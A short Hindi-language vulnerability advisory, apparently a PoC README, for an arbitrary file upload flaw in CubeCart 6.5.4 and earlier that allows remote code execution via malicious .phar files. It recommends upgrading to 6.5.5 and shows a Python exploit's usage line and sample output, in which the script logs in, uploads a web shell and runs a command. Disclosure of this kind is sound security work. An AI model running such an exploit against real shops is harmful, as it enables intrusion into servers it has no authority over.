
CubeCart <= 6.5.4 में एक मनमानी फ़ाइल अपलोड की कमज़ोरी है जो रिमोट कोड निष्पादन (RCE) का कारण बनती है।
CubeCart <= 6.5.4 एक मनमानी फ़ाइल अपलोड समस्या के लिए संवेदनशील है जो रिमोट कोड निष्पादन (RCE) की ओर ले जाती है। यह कमजोरी एप्लिकेशन के फ़ाइल प्रबंधक और इसके फ़िल्टर को प्रभावित करती है, जिससे हमलावर दुर्भावनापूर्ण कोड वाली .phar फ़ाइलें अपलोड कर सकते हैं। CubeCart को 6.5.5 में अपडेट किया जाना चाहिए क्योंकि इसमें इस कमजोरी को ठीक करने के लिए एक सुरक्षा पैच लागू किया गया है।
अधिक विवरण के लिए, कृपया संदर्भों में CubeCart की आधिकारिक घोषणा देखें।
एक स्वचालित प्रूफ-ऑफ-कॉन्सेप्ट (PoC) बनाया गया है, लेकिन इस कमजोरी का फ़ाइल प्रबंधक के माध्यम से एक दुर्भावनापूर्ण .phar फ़ाइल अपलोड करके मैन्युअल रूप से भी शोषण किया जा सकता है।
यह PoC का उपयोग है:
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>
इसे चलाने के बाद, सफल शोषण के लिए अपेक्षित आउटपुट यह है:
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami
[] ,----.___
__||_/___ '.
/ O|| /|
/ "" / /
/________/ / launching exploit
|________|/ please wait...
[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...
Output: www-data